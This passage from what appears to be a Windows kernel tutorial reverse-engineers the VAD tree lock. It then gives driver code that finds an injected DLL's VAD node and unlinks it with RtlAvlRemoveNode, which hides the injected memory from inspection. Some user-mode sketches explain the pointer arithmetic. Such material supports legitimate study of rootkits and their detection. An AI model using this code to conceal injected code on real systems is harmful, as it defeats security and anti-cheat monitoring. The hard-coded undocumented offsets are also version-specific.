This is now very clear. We can translate this assembly line-by-line into its exact C++ equivalent to find exactly where the VAD tree lock is stored in memory.

Now we can confidently say the VAD spinlock is located at offset 0x3EC inside the undocumented memory management substructure pointed to by _EPROCESS + 0x410.

0x03 Custom MiUnlockVadTree

Now that we know exactly how the OS locks the VAD tree, we can do the exact reverse to unlock it safely.

After reverse engineering MiLockVadTree, we know that it reads a pointer from the _EPROCESS block at offset 0x410 and obtains the lock address by adding 0x3EC to that pointer. We can easily translate this pointer math into C++:

// Assembly: mov rbx, [EPROCESS + 0x410]

// Cast to PUCHAR (1 byte) so we can add the exact byte offset

PVOID VmBase = *(PVOID*)((PUCHAR)pTarget_process + 0x410);

// Assembly: add rbx, 3ECh

PEX_SPIN_LOCK LockAddress = (PEX_SPIN_LOCK)((PUCHAR)VmBase + 0x3EC);

Now that we possess the exact memory address of the lock, we can release it and gracefully lower the CPU's IRQL back to its original state.

// Release the exclusive lock

ExReleaseSpinLockExclusiveFromDpcLevel(LockAddress);

// Restore the CPU's IRQL

if(OldIrql < 2) KeLowerIrql(OldIrql);

We have successfully forged our own version of an undocumented Windows Kernel function! We can now safely freeze the VAD tree, manipulate its pointers, and unlock it without triggering a Blue Screen of Death.

Find VAD Entry

Now that we have successfully reverse-engineered the lock and unlock mechanisms, we are finally ready to interact with the tree safely. We acquire the lock and grab the root of the tree:

Lock the tree

// Lock the VAD Tree

UCHAR OldIrql = pMiLockVadTree(2);

// Dereference the offset

g_pVadTree = (PRTL_AVL_TREE)((ULONG_PTR)pTarget_process + Offsets::vad_root_offset);

PRTL_BALANCED_NODE pVadRootNode = g_pVadTree->Root;

if(pVadRootNode == nullptr)

{

// The tree is completely empty, gracefully unlock and detach

CustomUnlockVadTree(pTarget_process, OldIrql);

KeUnstackDetachProcess(&apc_state);

LOG_W("[baaaa_bae] [-] VAD tree is empty. Cannot continue\n");

status = STATUS_NOT_FOUND;

return CleanStuffUp(status, pIrp);

}

CRITICAL KERNEL RULE: Notice that if pVadRootNode is null, we don't just return. Because we are holding an exclusive spinlock at DISPATCH_LEVEL, simply exiting the function would leave the lock held and the IRQL raised, and the system would hang or bug check shortly after. We must call our CustomUnlockVadTree and detach from the process context before returning any error.
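The general idea of "every exit path must run the cleanup" is often expressed in C++ with a scope guard. The following is a user-mode sketch of that pattern only. ScopeExit and DoWork are hypothetical names, and std::function is used for brevity even though it is not something you would use in a driver.

```cpp
#include <functional>
#include <utility>

// Runs a cleanup callable when the enclosing scope exits, on every return path.
class ScopeExit {
public:
    explicit ScopeExit(std::function<void()> fn) : fn_(std::move(fn)) {}
    ~ScopeExit() { if (fn_) fn_(); }
    ScopeExit(const ScopeExit&) = delete;
    ScopeExit& operator=(const ScopeExit&) = delete;

private:
    std::function<void()> fn_;
};

// Hypothetical routine with an early error return.
int DoWork(bool fail_early, int& cleanup_calls) {
    ScopeExit guard([&cleanup_calls] { ++cleanup_calls; });
    if (fail_early) return -1;  // cleanup still runs here
    return 0;                   // and here
}
```

The explicit unlock-then-return style used in this blog achieves the same thing by hand. The guard just makes it harder to forget a path.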

Virtual Page Numbers

Before we start walking the nodes in the tree, we need to know exactly what we are looking for. We don't search the tree using raw memory addresses; Windows organizes the VAD tree using Virtual Page Numbers (VPN).

Bitwise Math: >> PAGE_SHIFT (12)

In Windows, standard memory pages are exactly 4 KB (4096 bytes). PAGE_SHIFT is a macro defined as 12. Shifting our 64-bit memory address 12 bits to the right discards the byte offset within the page (the bottom 12 bits). The remaining 52 bits form the raw Virtual Page Number, the format stored inside the VAD nodes.

To convert our injected DLL's memory address into a Virtual Page Number (VPN), we perform a bitwise shift.

// Convert the raw memory address into a Virtual Page Number

const ULONG_PTR Target_vpn_for_InjectedDLL = (ULONG_PTR)sResources->vpInjectedDll_Base >> PAGE_SHIFT;
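
The shift can be checked in isolation with plain integers. The following is a minimal user-mode sketch; the helper names and the sample address are made up for illustration.

```cpp
#include <cassert>
#include <cstdint>

constexpr unsigned kPageShift = 12;                            // 4 KB pages
constexpr std::uint64_t kPageMask = (1ull << kPageShift) - 1;  // 0xFFF

// Drop the in-page byte offset to get the virtual page number.
constexpr std::uint64_t AddressToVpn(std::uint64_t address) {
    return address >> kPageShift;
}

// The bits that the shift throws away.
constexpr std::uint64_t PageOffset(std::uint64_t address) {
    return address & kPageMask;
}

// First byte of the page that a VPN refers to.
constexpr std::uint64_t VpnToPageBase(std::uint64_t vpn) {
    return vpn << kPageShift;
}
```

For the illustrative address 0x00007FF6A1B2C345, the VPN is 0x7FF6A1B2C and the discarded offset is 0x345.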

Iterative In-Order Traversal

0x01 The Manual Stack

In user mode, we would normally traverse a binary tree using a clean, recursive function. But in the Windows kernel, a thread's stack is very small (around 24KB), and we are walking the tree while holding a spinlock at DISPATCH_LEVEL. If recursion runs deeper than expected, we exhaust the kernel stack, and the resulting double fault surfaces as an UNEXPECTED_KERNEL_MODE_TRAP BSOD. To avoid recursion altogether, we allocate an array of 64 pointers to act as our manual stack.

RTL_BALANCED_NODE* stack[64] = {};

int top = -1;

The VAD tree is an AVL tree, meaning it is strictly self balancing. The depth of a balanced binary tree grows logarithmically. A depth of 64 levels can hold more nodes than the entire 64 bit memory space could ever physically map. It is mathematically impossible to overflow this stack in this context.
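
The depth claim can be sanity-checked with the standard AVL recurrence for the fewest nodes a tree with a given number of levels can contain. This is a sketch with two assumptions: a 128 TB user address space, and at least one 4 KB page per VAD.

```cpp
#include <cassert>
#include <cstdint>

// Fewest nodes an AVL tree with `levels` levels can contain:
// N(0) = 0, N(1) = 1, N(h) = N(h-1) + N(h-2) + 1.
constexpr std::uint64_t MinAvlNodes(unsigned levels) {
    if (levels == 0) return 0;
    std::uint64_t prev = 0;  // N(h-2)
    std::uint64_t cur = 1;   // N(h-1), starting at N(1)
    for (unsigned h = 2; h <= levels; ++h) {
        const std::uint64_t next = cur + prev + 1;
        prev = cur;
        cur = next;
    }
    return cur;
}

// Assumption: 128 TB (2^47 bytes) of user address space in 4 KB pages.
constexpr std::uint64_t kMaxUserPages = 1ull << (47 - 12);
```

Overflowing a 64-entry stack would need a 65-level tree. Under these assumptions, such a tree needs far more nodes than there are pages to describe.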

0x02 The Outer Loop

We start at the absolute root of the process's VAD tree. The outer while loop ensures we don't stop until every single branch has been explored and our manual stack is completely empty.

RTL_BALANCED_NODE* pCurrentNode = pVadRootNode;

// Keep running as long as we have a node to check, or nodes waiting in our stack

while(pCurrentNode != nullptr || top != -1)

{

0x03 The Deep Dive

In a binary search tree, the smallest addresses are always on the far left. We start at the root and traverse all the way to the far left. As we go down, we push every node we pass onto the stack so we can remember the path back up.

while(pCurrentNode != nullptr)

{

if(top < 63) stack[++top] = pCurrentNode;

else break;

pCurrentNode = pCurrentNode->Left;

}

0x04 Popping and Unwrapping

Once we hit the bottom, we pop the most recent node off our stack.

if(top == -1) break;

// Pop the last node we saw off the stack

pCurrentNode = stack[top--];

// Unwrap the node to get the actual VAD structure

PMMVAD pCurrentVad = CONTAINING_RECORD(pCurrentNode, MMVAD, Core);

The AVL tree only links RTL_BALANCED_NODE pointers; it has no notion of what a VAD is. In our definitions the node lives at the start of the Core field, so we use the classic Windows kernel macro CONTAINING_RECORD. It performs reverse pointer arithmetic, subtracting the offset of the Core field from the node pointer to find the starting address of the much larger _MMVAD structure that wraps it.
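
The pointer arithmetic behind CONTAINING_RECORD can be reproduced in user mode with offsetof. In this sketch ToyNode, ToyRecord and TOY_CONTAINING_RECORD are illustrative names, not the real kernel types. The node is deliberately not the first member, so the subtraction is visible.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

struct ToyNode {
    ToyNode* Left;
    ToyNode* Right;
};

struct ToyRecord {
    std::uint32_t Tag;   // placed first so Node is NOT at offset 0
    ToyNode Node;        // the part a tree would link together
    std::uint64_t StartingVpn;
    std::uint64_t EndingVpn;
};

// Same idea as CONTAINING_RECORD: step back from the embedded field
// to the start of the structure that contains it.
#define TOY_CONTAINING_RECORD(address, type, field) \
    (reinterpret_cast<type*>(reinterpret_cast<char*>(address) - offsetof(type, field)))

inline ToyRecord* RecordFromNode(ToyNode* node) {
    return TOY_CONTAINING_RECORD(node, ToyRecord, Node);
}
```

Given only a pointer to the embedded Node, RecordFromNode recovers the enclosing ToyRecord and all of its other fields.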

0x05 The Check

Now that we have the full _MMVAD structure, we perform the actual check: is our target region's VPN greater than or equal to the VAD's starting VPN and less than or equal to its ending VPN? Both bounds are inclusive. Because this is an in-order traversal, we visit the VADs in ascending address order.

// Does our target VPN fall inside this VAD's memory range?

if(pInjectedDLLVAD == nullptr && Target_vpn_for_InjectedDLL >= pCurrentVad->Core.StartingVpn && Target_vpn_for_InjectedDLL <= pCurrentVad->Core.EndingVpn)

{

pInjectedDLLVAD = pCurrentVad;

}

0x06 The Pivot

After checking the current node, we step one node to the right. The outer loop restarts, takes that right child, and instantly drills all the way down its left side, popping back up, checking, and pivoting right again.

// Pivot to the right child and restart the outer loop

pCurrentNode = pCurrentNode->Right;

}

This loop guarantees every single node in the tree is evaluated perfectly without ever risking a recursive stack overflow.
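
Put together, the six steps form an ordinary iterative in-order walk. The sketch below runs the same control flow over a toy user-mode tree. ToyVad and FindByVpn are illustrative names, and unlike the loop above it returns as soon as a match is found.

```cpp
#include <cassert>
#include <cstdint>

struct ToyVad {
    ToyVad* Left;
    ToyVad* Right;
    std::uint64_t StartingVpn;  // inclusive
    std::uint64_t EndingVpn;    // inclusive
};

// Iterative in-order walk using a fixed-size explicit stack.
// Returns the first node whose range contains `vpn`, or nullptr.
inline const ToyVad* FindByVpn(const ToyVad* root, std::uint64_t vpn) {
    constexpr int kMaxDepth = 64;
    const ToyVad* stack[kMaxDepth] = {};
    int top = -1;
    const ToyVad* cur = root;

    while (cur != nullptr || top != -1) {
        // Descend to the leftmost node, remembering the path.
        while (cur != nullptr) {
            if (top >= kMaxDepth - 1) return nullptr;  // deeper than expected: give up
            stack[++top] = cur;
            cur = cur->Left;
        }
        cur = stack[top--];                            // visit the node
        if (vpn >= cur->StartingVpn && vpn <= cur->EndingVpn) {
            return cur;
        }
        cur = cur->Right;                              // pivot right
    }
    return nullptr;
}
```

Because the tree is ordered by VPN, a plain binary-search descent would also locate the node in logarithmic time. The full walk is kept here only to mirror the steps described above.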

Unlink the VAD



Now all we have to do is unlink the VAD entry. Instead of manually unlinking the node, we can make the OS do it for us. Searching for RemoveNode in IDA, we see:

RtlAvlRemoveNode

Since the VAD tree is an AVL tree, RtlAvlRemoveNode is the perfect function for our task. Its signature is:

void __fastcall RtlAvlRemoveNode(unsigned __int64 *, __int64)



We need to figure out what these parameters are. A good way to do this is looking at how other functions call this function. Looking at the cross references:

xrefs to RtlAvlRemoveNode

We see that MiRemoveVad calls this function, which means we are on the right track. Next we look at which parameters MiRemoveVad passes to RtlAvlRemoveNode. It calls RtlAvlRemoveNode with:



RtlAvlRemoveNode((unsigned __int64 *)(Process + 0x558), rcx0);

Process + 0x558 does look like an offset into the _EPROCESS structure, and it matches the VadRoot offset we found earlier. We can verify this in the debugger:

Confirming the offset

Now, rcx0 is the first argument passed into MiRemoveVad itself (__int64 rcx0). Because the function uses the __fastcall calling convention, this argument is originally passed in the RCX register. We can verify that rcx0 is a VAD node by looking at how the code interacts with it earlier:

if ( a2 )

{

v8 = (*(unsigned int *)(rcx0 + 24) | ((unsigned __int64)*(unsigned __int8 *)(rcx0 + 32) << 32)) << 12;

v9 = ((*(unsigned int *)(rcx0 + 28) | ((unsigned __int64)*(unsigned __int8 *)(rcx0 + 33) << 32)) << 12) | 0xFFF;

PreviousVad = MiGetPreviousVad(rcx0);

NextVad = MiGetNextVad(rcx0);

}

It extracts the starting and ending VPN using offsets like rcx0 + 24 and rcx0 + 28, and passes it into functions like MiGetPreviousVad(rcx0) and MiGetNextVad(rcx0).
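
The arithmetic in that decompiled snippet is easier to follow as small helpers: a 32-bit low part and an 8-bit high part are joined into one VPN, which is then shifted back into a byte address. The helper names below are made up, and the sketch only mirrors the expressions shown above.

```cpp
#include <cassert>
#include <cstdint>

// Join the 32-bit low part and 8-bit high part into a single VPN,
// as in (low | ((unsigned __int64)high << 32)).
constexpr std::uint64_t JoinVpn(std::uint32_t low, std::uint8_t high) {
    return static_cast<std::uint64_t>(low) |
           (static_cast<std::uint64_t>(high) << 32);
}

// First byte of the region: VPN << 12 (the v8 expression).
constexpr std::uint64_t FirstByte(std::uint32_t low, std::uint8_t high) {
    return JoinVpn(low, high) << 12;
}

// Last byte of the region: (VPN << 12) | 0xFFF (the v9 expression).
constexpr std::uint64_t LastByte(std::uint32_t low, std::uint8_t high) {
    return (JoinVpn(low, high) << 12) | 0xFFFull;
}
```

With a low part of 0xFF6A1B2C and a high part of 0x07, the joined VPN is 0x7FF6A1B2C, covering bytes 0x7FF6A1B2C000 through 0x7FF6A1B2CFFF.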

Now we can confidently say that the function is effectively executing:

RtlAvlRemoveNode(VadRootTreePointer, VadNodeToRemove);

The unlinking now becomes a single function call, which makes our lives much easier:

if(pInjectedDLLVAD)

{

if(my_pRtlAvlRemoveNode)

{

my_pRtlAvlRemoveNode((PRTL_AVL_TABLE)g_pVadTree, reinterpret_cast<PRTL_BALANCED_NODE>(&pInjectedDLLVAD->Core.VadNode));

status = STATUS_SUCCESS;

} else status = STATUS_UNSUCCESSFUL;

} else status = STATUS_NOT_FOUND;

// And we don't forget to unlock the tree

CustomUnlockVadTree(pTarget_process, OldIrql);

Finally, we unlock the tree. If we skip this step, the system stays stuck at a high IRQL with the lock held and hangs.